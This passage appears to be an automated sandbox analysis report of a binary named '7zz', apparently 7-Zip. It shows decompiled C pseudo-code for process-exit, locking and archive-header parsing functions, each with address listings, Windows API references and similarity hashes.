						_t22 =  *0x496590; // 0x22759fc
						_push(_t24);
						_t4 = _t22 - 4; // 0x22759f8
						_t25 = _t4;
						if(_t25 >= _t9) {
							do {
								_t11 =  *_t25;
								if(_t11 != 0) {
									 *_t11();
								}
								_t25 = _t25 - 4;
								_t32 = _t25 -  *0x496594; // 0x22759d0
							} while (_t32 >= 0);
						}
					}
					E0046E7CE(0x48a0e0, 0x48a0e8);
				}
				E0046E7CE(0x48a0ec, 0x48a0f4);
				if(_t16 == 0) {
					 *0x49372c = _t23; // executed
					ExitProcess(_a4);
				}
				return E0046E7C5();
			}












                                                                                                                                    0x0046e717
                                                                                                                                    0x0046e718
                                                                                                                                    0x0046e71f
                                                                                                                                    0x0046e720
                                                                                                                                    0x0046e726
                                                                                                                                    0x0046e733
                                                                                                                                    0x0046e733
                                                                                                                                    0x0046e73f
                                                                                                                                    0x0046e743
                                                                                                                                    0x0046e749
                                                                                                                                    0x0046e74f
                                                                                                                                    0x0046e751
                                                                                                                                    0x0046e758
                                                                                                                                    0x0046e75a
                                                                                                                                    0x0046e760
                                                                                                                                    0x0046e761
                                                                                                                                    0x0046e761
                                                                                                                                    0x0046e766
                                                                                                                                    0x0046e768
                                                                                                                                    0x0046e768
                                                                                                                                    0x0046e76c
                                                                                                                                    0x0046e76e
                                                                                                                                    0x0046e76e
                                                                                                                                    0x0046e770
                                                                                                                                    0x0046e773
                                                                                                                                    0x0046e773
                                                                                                                                    0x0046e768
                                                                                                                                    0x0046e77b
                                                                                                                                    0x0046e786
                                                                                                                                    0x0046e78c
                                                                                                                                    0x0046e797
                                                                                                                                    0x0046e7a1
                                                                                                                                    0x0046e7ae
                                                                                                                                    0x0046e7b4
                                                                                                                                    0x0046e7b4
                                                                                                                                    0x0046e7a9

                                                                                                                                    APIs
                                                                                                                                    • GetCurrentProcess.KERNEL32(0046D01D,?,0046E702,00000000,00000000,00000000,0046D01D,00000000), ref: 0046E72C
                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,0046E702,00000000,00000000,00000000,0046D01D,00000000), ref: 0046E733
                                                                                                                                    • ExitProcess.KERNEL32 ref: 0046E7B4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1703294689-0
                                                                                                                                    • Opcode ID: d37c32f3b74641771bf8449d0f21babc3d9490daefb6715abc0a0bd2884901a9
                                                                                                                                    • Instruction ID: f2142e9f323653ae12a02806cee2fc2220ca4adb72cbe7e174c19522fd5f48b0
                                                                                                                                    • Opcode Fuzzy Hash: d37c32f3b74641771bf8449d0f21babc3d9490daefb6715abc0a0bd2884901a9
                                                                                                                                    • Instruction Fuzzy Hash: D2010879100301AEEA10AF67FC8151E77E8EB65752B10843FF44456151EB699C908B1F
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0040E6D6 Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 2815 40e6d6-40e70a __EH_prolog EnterCriticalSection call 40d340 2817 40e70c-40e71a call 40d071 2815->2817 2818 40e71d-40e735 LeaveCriticalSection 2815->2818 2817->2818
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E0040E6D6(intOrPtr* __ecx) {
				intOrPtr* _t15;
				void* _t16;
				void* _t22;
				struct _CRITICAL_SECTION* _t23;
				void* _t25;
				intOrPtr* _t26;
				intOrPtr* _t29;
				void* _t30;

				L0046B890(E00474014, _t30);
				_t26 = __ecx;
				_t23 = __ecx + 4;
				 *(_t30 - 0x10) = _t23;
				EnterCriticalSection(_t23);
				_t15 =  *_t26;
				 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
				_t16 =  *((intOrPtr*)( *_t15 + 0x10))(_t15,  *((intOrPtr*)(_t30 + 8)),  *((intOrPtr*)(_t30 + 0xc)), 0, 0, _t22, _t25, __ecx);
				if(_t16 == 0) {
					_t29 =  *_t26;
					_t16 =  *((intOrPtr*)( *_t29 + 0xc))(_t29,  *((intOrPtr*)(_t30 + 0x10)),  *((intOrPtr*)(_t30 + 0x14)),  *((intOrPtr*)(_t30 + 0x18)));
				}
				LeaveCriticalSection(_t23);
				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
				return _t16;
			}











                                                                                                                                    0x0040e6db
                                                                                                                                    0x0040e6e2
                                                                                                                                    0x0040e6e5
                                                                                                                                    0x0040e6e9
                                                                                                                                    0x0040e6ec
                                                                                                                                    0x0040e6f2
                                                                                                                                    0x0040e6f8
                                                                                                                                    0x0040e705
                                                                                                                                    0x0040e70a
                                                                                                                                    0x0040e70f
                                                                                                                                    0x0040e71a
                                                                                                                                    0x0040e71a
                                                                                                                                    0x0040e720
                                                                                                                                    0x0040e72d
                                                                                                                                    0x0040e735

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 0040E6DB
                                                                                                                                    • EnterCriticalSection.KERNEL32(00000000,?,?,?,0040E75C,?,?,?,?,?), ref: 0040E6EC
                                                                                                                                    • LeaveCriticalSection.KERNEL32(00000000,?,?,?,0040E75C,?,?,?,?,?), ref: 0040E720
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection$EnterH_prologLeave
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 367238759-0
                                                                                                                                    • Opcode ID: 049483b65675be0fe03f61d34f865e17871a24ff9367e82253095f38623ff512
                                                                                                                                    • Instruction ID: e741d22780284c861742e84a626bb0d46a40b6509f00f1721e03e5846f5cf661
                                                                                                                                    • Opcode Fuzzy Hash: 049483b65675be0fe03f61d34f865e17871a24ff9367e82253095f38623ff512
                                                                                                                                    • Instruction Fuzzy Hash: EA011D76A00214AFCB119F94CC08B9EB7B9FF88711F10886AFD05E7250C774A950DF64
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0042EC5C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 315COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                    			E0042EC5C(intOrPtr* __ecx, void* __eflags) {
				char* _t134;
				void* _t139;
				intOrPtr _t140;
				signed int _t143;
				intOrPtr* _t144;
				signed int _t146;
				void* _t148;
				void* _t152;
				signed int _t156;
				void* _t160;
				intOrPtr* _t171;
				intOrPtr* _t172;
				void* _t174;
				intOrPtr _t178;
				intOrPtr _t182;
				intOrPtr* _t183;
				signed int _t186;
				intOrPtr _t221;
				intOrPtr* _t222;
				void* _t224;
				void* _t228;
				signed int _t232;
				intOrPtr _t239;
				signed int _t240;
				intOrPtr _t243;
				signed int _t244;
				intOrPtr _t246;
				signed int _t248;
				intOrPtr* _t252;
				signed int _t254;
				void* _t255;

				L0046B890(0x477698, _t255);
				_t243 =  *((intOrPtr*)(_t255 + 8));
				_t252 = __ecx;
				L0042B5A9(_t243);
				 *((intOrPtr*)(_t243 + 0x138)) =  *((intOrPtr*)(_t252 + 0x20));
				 *((intOrPtr*)(_t243 + 0x13c)) =  *((intOrPtr*)(_t252 + 0x24));
				_t134 = _t243 + 0x130;
				 *_t134 =  *((intOrPtr*)(_t252 + 0x2e));
				_t193 =  *((intOrPtr*)(_t252 + 0x2f));
				 *((char*)(_t243 + 0x131)) =  *((intOrPtr*)(_t252 + 0x2f));
				if( *_t134 != 0) {
					E0042D0F8(_t193);
				}
				_t244 =  *(_t252 + 0x34);
				 *((intOrPtr*)(_t255 - 0x18)) =  *((intOrPtr*)(_t252 + 0x30));
				_t186 =  *(_t252 + 0x38);
				 *(_t255 - 0x14) =  *(_t252 + 0x3c);
				 *(_t255 - 0x10) =  *(_t252 + 0x40);
				 *((intOrPtr*)(_t255 - 0x48)) =  *((intOrPtr*)(_t252 + 0x44));
				_t228 = 0x14;
				_t139 = L0046B1C0(_t252 + 0x34, _t228);
				if( *((intOrPtr*)(_t255 - 0x18)) != 0 || (_t244 | _t186) != 0 || ( *(_t255 - 0x14) |  *(_t255 - 0x10)) != 0 ||  *((intOrPtr*)(_t255 - 0x48)) != 0) {
					__eflags = _t139 -  *((intOrPtr*)(_t255 - 0x18));
					if(_t139 !=  *((intOrPtr*)(_t255 - 0x18))) {
						E0042D0F8(0);
					}
					goto L24;
				} else {
					_t171 =  *_t252;
					_t143 =  *((intOrPtr*)( *_t171 + 0x10))(_t171, 0, 0, 1, _t255 - 0x1c);
					if(_t143 != 0) {
						L55:
						 *[fs:0x0] =  *((intOrPtr*)(_t255 - 0xc));
						return _t143;
					}
					_t172 =  *_t252;
					_t143 =  *((intOrPtr*)( *_t172 + 0x10))(_t172, 0, 0, 2, _t255 - 0x24);
					if(_t143 != 0) {
						goto L55;
					}
					_t221 =  *((intOrPtr*)(_t255 - 0x24));
					_t239 =  *((intOrPtr*)(_t255 - 0x20));
					_t248 = 0x1f4;
					_t174 = _t221 -  *((intOrPtr*)(_t255 - 0x1c));
					asm("sbb edx, [ebp-0x18]");
					 *((intOrPtr*)(_t255 - 0x48)) = _t239;
					if(_t174 == 0 && _t174 < 0x1f4) {
						_t248 = _t221 -  *((intOrPtr*)(_t255 - 0x1c));
					}
					_t222 =  *_t252;
					asm("cdq");
					_t143 =  *((intOrPtr*)( *_t222 + 0x10))(_t222,  ~_t248, _t239, 2, _t255 - 0x24);
					_t271 = _t143;
					if(_t143 == 0) {
						_t240 = _t255 - 0x248;
						_t143 = E0040FAC0(_t271, _t248);
						if(_t143 != 0) {
							goto L55;
						}
						_t37 = _t248 - 2; // 0x1f2
						_t224 = _t37;
						if(_t224 < 0) {
							L31:
							_t143 = 1;
							goto L55;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t178 =  *((intOrPtr*)(_t255 + _t224 - 0x248));
							if(_t178 == 0x17 &&  *((char*)(_t255 + _t224 - 0x247)) == 6) {
								break;
							}
							if(_t178 != 1 ||  *((char*)(_t255 + _t224 - 0x247)) != 4) {
								_t224 = _t224 - 1;
								if(_t224 >= 0) {
									continue;
								}
							}
							break;
						}
						if(_t224 < 0) {
							goto L31;
						}
						asm("cdq");
						 *(_t255 - 0x14) = _t248 - _t224;
						 *(_t255 - 0x10) = _t240;
						asm("cdq");
						_t186 = _t240;
						asm("sbb ebx, [ebp-0x18]");
						_t244 = _t224 -  *((intOrPtr*)(_t255 - 0x1c)) +  *((intOrPtr*)(_t255 - 0x24));
						asm("adc ebx, [ebp-0x20]");
						_t182 = L0046B1C0(_t255 + _t224 - 0x248,  *(_t255 - 0x14));
						 *((intOrPtr*)(_t255 - 0x48)) = _t182;
						_t183 =  *_t252;
						_t143 =  *((intOrPtr*)( *_t183 + 0x10))(_t183,  *((intOrPtr*)(_t255 - 0x1c)),  *((intOrPtr*)(_t255 - 0x18)), 0, 0);
						if(_t143 == 0) {
							L24:
							_t140 =  *((intOrPtr*)(_t255 + 8));
							asm("adc edx, 0x0");
							 *((intOrPtr*)(_t140 + 0x140)) =  *((intOrPtr*)(_t252 + 0x20)) + 0x20;
							 *((intOrPtr*)(_t140 + 0x144)) =  *((intOrPtr*)(_t252 + 0x24));
							__eflags =  *(_t255 - 0x14) |  *(_t255 - 0x10);
							if(( *(_t255 - 0x14) |  *(_t255 - 0x10)) != 0) {
								__eflags =  *(_t255 - 0x10);
								if( *(_t255 - 0x10) > 0) {
									goto L31;
								}
								__eflags =  *(_t255 - 0x14) - 0xffffffff;
								if( *(_t255 - 0x14) > 0xffffffff) {
									goto L31;
								}
								__eflags = _t186;
								if(__eflags > 0) {
									L32:
									_t144 =  *_t252;
									_t143 =  *((intOrPtr*)( *_t144 + 0x10))(_t144, _t244, _t186, 1, 0);
									__eflags = _t143;
									if(_t143 != 0) {
										goto L55;
									}
									 *((intOrPtr*)(_t255 - 0x2c)) = 0;
									 *((intOrPtr*)(_t255 - 0x28)) = 0;
									 *((intOrPtr*)(_t255 - 0x30)) = 0x47a7ec;
									 *(_t255 - 4) = 0;
									E0040FA26(_t255 - 0x30,  *(_t255 - 0x14));
									_t146 = E0040FAC0(__eflags,  *(_t255 - 0x14)); // executed
									__eflags = _t146;
									if(_t146 == 0) {
										asm("adc edx, 0x0");
										 *((intOrPtr*)(_t252 + 0x48)) =  *((intOrPtr*)(_t252 + 0x48)) +  *(_t255 - 0x14) + 0x20;
										asm("adc [esi+0x4c], edx");
										_t232 =  *(_t255 - 0x14);
										_t246 =  *((intOrPtr*)(_t255 + 8));
										asm("adc eax, ebx");
										asm("adc eax, 0x0");
										 *((intOrPtr*)(_t246 + 0x1c8)) = _t232 + _t244 + 0x20;
										_t208 =  *((intOrPtr*)(_t255 - 0x28));
										 *(_t246 + 0x1cc) =  *(_t255 - 0x10);
										_t148 = L0046B1C0( *((intOrPtr*)(_t255 - 0x28)), _t232);
										__eflags = _t148 -  *((intOrPtr*)(_t255 - 0x48));
										if(_t148 !=  *((intOrPtr*)(_t255 - 0x48))) {
											E0042D0F8(_t208);
										}
										 *(_t255 - 0x50) =  *(_t255 - 0x50) & 0x00000000;
										 *(_t255 - 4) = 1;
										E0042D093(_t252, _t255 - 0x30);
										 *((intOrPtr*)(_t255 - 0x40)) = 0;
										 *(_t255 - 0x3c) = 0;
										 *((intOrPtr*)(_t255 - 0x38)) = 0;
										 *((intOrPtr*)(_t255 - 0x34)) = 4;
										 *((intOrPtr*)(_t255 - 0x44)) = 0x47b3e0;
										_t210 =  *((intOrPtr*)(_t252 + 0x18));
										 *(_t255 - 4) = 2;
										_t152 = E0042D1A5( *((intOrPtr*)(_t252 + 0x18)), _t232);
										__eflags = _t152 - 1;
										if(_t152 != 1) {
											L39:
											__eflags = _t152 - 0x17;
											if(_t152 != 0x17) {
												L41:
												E0042D0F8(_t210);
												L42:
												_push( *((intOrPtr*)(_t255 + 0x10)));
												_t211 = _t252;
												_push( *((intOrPtr*)(_t255 + 0xc)));
												_push(_t255 - 0x44);
												_push(_t246 + 0x150);
												_push( *((intOrPtr*)(_t246 + 0x144)));
												_push( *((intOrPtr*)(_t246 + 0x140)));
												_t156 = E0042E01C(_t252, _t232, __eflags); // executed
												__eflags = _t156;
												if(_t156 == 0) {
													__eflags =  *(_t255 - 0x3c);
													if( *(_t255 - 0x3c) != 0) {
														__eflags =  *(_t255 - 0x3c) - 1;
														if( *(_t255 - 0x3c) > 1) {
															E0042D0F8(_t211);
														}
														E0042CFE5(_t255 - 0x54);
														E0042D093(_t252,  *((intOrPtr*)( *((intOrPtr*)(_t255 - 0x38)))));
														_t214 =  *((intOrPtr*)(_t252 + 0x18));
														_t160 = E0042D1A5( *((intOrPtr*)(_t252 + 0x18)), _t232);
														__eflags = _t160 - 1;
														if(_t160 != 1) {
															L50:
															E0042D0F8(_t214);
															goto L51;
														} else {
															__eflags = _t232;
															if(_t232 == 0) {
																goto L51;
															}
															goto L50;
														}
													}
													 *((intOrPtr*)(_t255 - 0x44)) = 0x47b3e0;
													 *(_t255 - 4) = 4;
													_t254 = 0;
													goto L53;
												}
												 *((intOrPtr*)(_t255 - 0x44)) = 0x47b3e0;
												 *(_t255 - 4) = 3;
												goto L52;
											}
											__eflags = _t232;
											if(__eflags == 0) {
												goto L42;
											}
											goto L41;
										} else {
											__eflags = _t232;
											if(_t232 == 0) {
												L51:
												_push( *((intOrPtr*)(_t255 + 0x10)));
												 *((intOrPtr*)(_t246 + 0x1c0)) =  *((intOrPtr*)(_t252 + 0x48));
												_push( *((intOrPtr*)(_t255 + 0xc)));
												 *((intOrPtr*)(_t246 + 0x1c4)) =  *((intOrPtr*)(_t252 + 0x4c));
												_push(_t246);
												_t156 = E0042E3B2(_t252, _t232);
												 *((intOrPtr*)(_t255 - 0x44)) = 0x47b3e0;
												 *(_t255 - 4) = 5;
												L52:
												_t254 = _t156;
												L53:
												E0040862D();
												 *(_t255 - 4) = 1;
												E00408604(_t255 - 0x44);
												_t123 = _t255 - 4;
												 *_t123 =  *(_t255 - 4) & 0x00000000;
												__eflags =  *_t123;
												E0042CFE5(_t255 - 0x54);
												L54:
												 *((intOrPtr*)(_t255 - 0x30)) = 0x47a7ec;
												E00407A18( *((intOrPtr*)(_t255 - 0x28)));
												_t143 = _t254;
												goto L55;
											}
											goto L39;
										}
									}
									_t254 = _t146;
									goto L54;
								}
								if(__eflags < 0) {
									goto L31;
								}
								__eflags = _t244;
								if(_t244 >= 0) {
									goto L32;
								}
								goto L31;
							}
							_t143 = 0;
							goto L55;
						}
					}
					goto L55;
				}
			}


































                                                                                                                                    0x0042ec61
                                                                                                                                    0x0042ec6f
                                                                                                                                    0x0042ec72
                                                                                                                                    0x0042ec76
                                                                                                                                    0x0042ec7e
                                                                                                                                    0x0042ec87
                                                                                                                                    0x0042ec90
                                                                                                                                    0x0042ec96
                                                                                                                                    0x0042ec98
                                                                                                                                    0x0042ec9e
                                                                                                                                    0x0042eca4
                                                                                                                                    0x0042eca6
                                                                                                                                    0x0042eca6
                                                                                                                                    0x0042ecae
                                                                                                                                    0x0042ecb1
                                                                                                                                    0x0042ecb7
                                                                                                                                    0x0042ecba
                                                                                                                                    0x0042ecc3
                                                                                                                                    0x0042eccb
                                                                                                                                    0x0042ecce
                                                                                                                                    0x0042eccf
                                                                                                                                    0x0042ecd9
                                                                                                                                    0x0042ee08
                                                                                                                                    0x0042ee0b
                                                                                                                                    0x0042ee0d
                                                                                                                                    0x0042ee0d
                                                                                                                                    0x00000000
                                                                                                                                    0x0042ecfe
                                                                                                                                    0x0042ecfe
                                                                                                                                    0x0042ed0b
                                                                                                                                    0x0042ed10
                                                                                                                                    0x0042f013
                                                                                                                                    0x0042f019
                                                                                                                                    0x0042f021
                                                                                                                                    0x0042f021
                                                                                                                                    0x0042ed16
                                                                                                                                    0x0042ed25
                                                                                                                                    0x0042ed2a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0042ed30
                                                                                                                                    0x0042ed33
                                                                                                                                    0x0042ed38
                                                                                                                                    0x0042ed3d
                                                                                                                                    0x0042ed40
                                                                                                                                    0x0042ed43
                                                                                                                                    0x0042ed46
                                                                                                                                    0x0042ed4f
                                                                                                                                    0x0042ed4f
                                                                                                                                    0x0042ed51
                                                                                                                                    0x0042ed5f
                                                                                                                                    0x0042ed63
                                                                                                                                    0x0042ed66
                                                                                                                                    0x0042ed68
                                                                                                                                    0x0042ed71
                                                                                                                                    0x0042ed77
                                                                                                                                    0x0042ed7e
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0042ed84
                                                                                                                                    0x0042ed84
                                                                                                                                    0x0042ed89
                                                                                                                                    0x0042ee52
                                                                                                                                    0x0042ee54
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0042ed8f
                                                                                                                                    0x0042ed8f
                                                                                                                                    0x0042ed8f
                                                                                                                                    0x0042ed98
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0042eda6
                                                                                                                                    0x0042edb2
                                                                                                                                    0x0042edb3
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0042edb3
                                                                                                                                    0x00000000
                                                                                                                                    0x0042eda6
                                                                                                                                    0x0042edb7
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0042edc1
                                                                                                                                    0x0042edc2
                                                                                                                                    0x0042edc7
                                                                                                                                    0x0042edd1
                                                                                                                                    0x0042edd4
                                                                                                                                    0x0042eddc
                                                                                                                                    0x0042eddf
                                                                                                                                    0x0042ede2
                                                                                                                                    0x0042ede5
                                                                                                                                    0x0042edf1
                                                                                                                                    0x0042edf4
                                                                                                                                    0x0042edfc
                                                                                                                                    0x0042ee01
                                                                                                                                    0x0042ee12
                                                                                                                                    0x0042ee18
                                                                                                                                    0x0042ee1e
                                                                                                                                    0x0042ee21
                                                                                                                                    0x0042ee27
                                                                                                                                    0x0042ee30
                                                                                                                                    0x0042ee33
                                                                                                                                    0x0042ee3c
                                                                                                                                    0x0042ee40
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0042ee42
                                                                                                                                    0x0042ee46
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0042ee48
                                                                                                                                    0x0042ee4a
                                                                                                                                    0x0042ee5a
                                                                                                                                    0x0042ee5a
                                                                                                                                    0x0042ee65
                                                                                                                                    0x0042ee6a
                                                                                                                                    0x0042ee6c
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0042ee72
                                                                                                                                    0x0042ee75
                                                                                                                                    0x0042ee78
                                                                                                                                    0x0042ee82
                                                                                                                                    0x0042ee88
                                                                                                                                    0x0042ee95
                                                                                                                                    0x0042ee9a
                                                                                                                                    0x0042ee9c
                                                                                                                                    0x0042eeb0
                                                                                                                                    0x0042eeb3
                                                                                                                                    0x0042eeb6
                                                                                                                                    0x0042eeb9
                                                                                                                                    0x0042eec0
                                                                                                                                    0x0042eec3
                                                                                                                                    0x0042eec8
                                                                                                                                    0x0042eecb
                                                                                                                                    0x0042eed1
                                                                                                                                    0x0042eed4
                                                                                                                                    0x0042eeda
                                                                                                                                    0x0042eedf
                                                                                                                                    0x0042eee2
                                                                                                                                    0x0042eee4
                                                                                                                                    0x0042eee4
                                                                                                                                    0x0042eee9
                                                                                                                                    0x0042eef5
                                                                                                                                    0x0042eef9
                                                                                                                                    0x0042ef05
                                                                                                                                    0x0042ef08
                                                                                                                                    0x0042ef0b
                                                                                                                                    0x0042ef0e
                                                                                                                                    0x0042ef15
                                                                                                                                    0x0042ef18
                                                                                                                                    0x0042ef1b
                                                                                                                                    0x0042ef1f
                                                                                                                                    0x0042ef24
                                                                                                                                    0x0042ef27
                                                                                                                                    0x0042ef31
                                                                                                                                    0x0042ef31
                                                                                                                                    0x0042ef34
                                                                                                                                    0x0042ef3a
                                                                                                                                    0x0042ef3a
                                                                                                                                    0x0042ef3f
                                                                                                                                    0x0042ef3f
                                                                                                                                    0x0042ef45
                                                                                                                                    0x0042ef47
                                                                                                                                    0x0042ef4a
                                                                                                                                    0x0042ef51
                                                                                                                                    0x0042ef52
                                                                                                                                    0x0042ef58
                                                                                                                                    0x0042ef5e
                                                                                                                                    0x0042ef63
                                                                                                                                    0x0042ef65
                                                                                                                                    0x0042ef70
                                                                                                                                    0x0042ef74
                                                                                                                                    0x0042ef81
                                                                                                                                    0x0042ef85
                                                                                                                                    0x0042ef87
                                                                                                                                    0x0042ef87
                                                                                                                                    0x0042ef8f
                                                                                                                                    0x0042ef9d
                                                                                                                                    0x0042efa2
                                                                                                                                    0x0042efa5
                                                                                                                                    0x0042efaa
                                                                                                                                    0x0042efad
                                                                                                                                    0x0042efb3
                                                                                                                                    0x0042efb3
                                                                                                                                    0x00000000
                                                                                                                                    0x0042efaf
                                                                                                                                    0x0042efaf
                                                                                                                                    0x0042efb1
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0042efb1
                                                                                                                                    0x0042efad
                                                                                                                                    0x0042ef76
                                                                                                                                    0x0042ef79
                                                                                                                                    0x0042ef7d
                                                                                                                                    0x00000000
                                                                                                                                    0x0042ef7d
                                                                                                                                    0x0042ef67
                                                                                                                                    0x0042ef6a
                                                                                                                                    0x00000000
                                                                                                                                    0x0042ef6a
                                                                                                                                    0x0042ef36
                                                                                                                                    0x0042ef38
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0042ef29
                                                                                                                                    0x0042ef29
                                                                                                                                    0x0042ef2b
                                                                                                                                    0x0042efb8
                                                                                                                                    0x0042efb8
                                                                                                                                    0x0042efbe
                                                                                                                                    0x0042efc7
                                                                                                                                    0x0042efcc
                                                                                                                                    0x0042efd2
                                                                                                                                    0x0042efd3
                                                                                                                                    0x0042efd8
                                                                                                                                    0x0042efdb
                                                                                                                                    0x0042efdf
                                                                                                                                    0x0042efdf
                                                                                                                                    0x0042efe1
                                                                                                                                    0x0042efe4
                                                                                                                                    0x0042efec
                                                                                                                                    0x0042eff0
                                                                                                                                    0x0042eff5
                                                                                                                                    0x0042eff5
                                                                                                                                    0x0042eff5
                                                                                                                                    0x0042effc
                                                                                                                                    0x0042f001
                                                                                                                                    0x0042f004
                                                                                                                                    0x0042f00b
                                                                                                                                    0x0042f011
                                                                                                                                    0x00000000
                                                                                                                                    0x0042f011
                                                                                                                                    0x00000000
                                                                                                                                    0x0042ef2b
                                                                                                                                    0x0042ef27
                                                                                                                                    0x0042ee9e
                                                                                                                                    0x00000000
                                                                                                                                    0x0042ee9e
                                                                                                                                    0x0042ee4c
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0042ee4e
                                                                                                                                    0x0042ee50
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0042ee50
                                                                                                                                    0x0042ee35
                                                                                                                                    0x00000000
                                                                                                                                    0x0042ee35
                                                                                                                                    0x0042ee03
                                                                                                                                    0x00000000
                                                                                                                                    0x0042ed68

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog
                                                                                                                                    • String ID: c[@
                                                                                                                                    • API String ID: 3519838083-2588109156
                                                                                                                                    • Opcode ID: 8a64972ee4c077eab65c48b087dce4589bc7ef48ef535aabefce3003df9f5d4d
                                                                                                                                    • Instruction ID: bcf0ec3d1ae188e7939240ae46176005842349514c47eef13008c3777b72f97c
                                                                                                                                    • Opcode Fuzzy Hash: 8a64972ee4c077eab65c48b087dce4589bc7ef48ef535aabefce3003df9f5d4d
